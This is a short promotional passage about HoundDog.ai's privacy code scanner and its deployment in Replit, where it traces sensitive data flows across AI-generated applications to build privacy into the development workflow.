The most visible deployment is in Replit, where the scanner helps protect the more than 45M users of the AI app generation platform. It identifies privacy risks and traces sensitive data flows across millions of AI-generated applications. This allows Replit to embed privacy directly into its app generation workflow so that privacy becomes a core feature rather than an afterthought.

By shifting privacy into the earliest stages of development and providing continuous visibility, enforcement, and documentation, HoundDog.ai makes it possible for teams to build secure and compliant software at the speed that modern AI-driven development demands.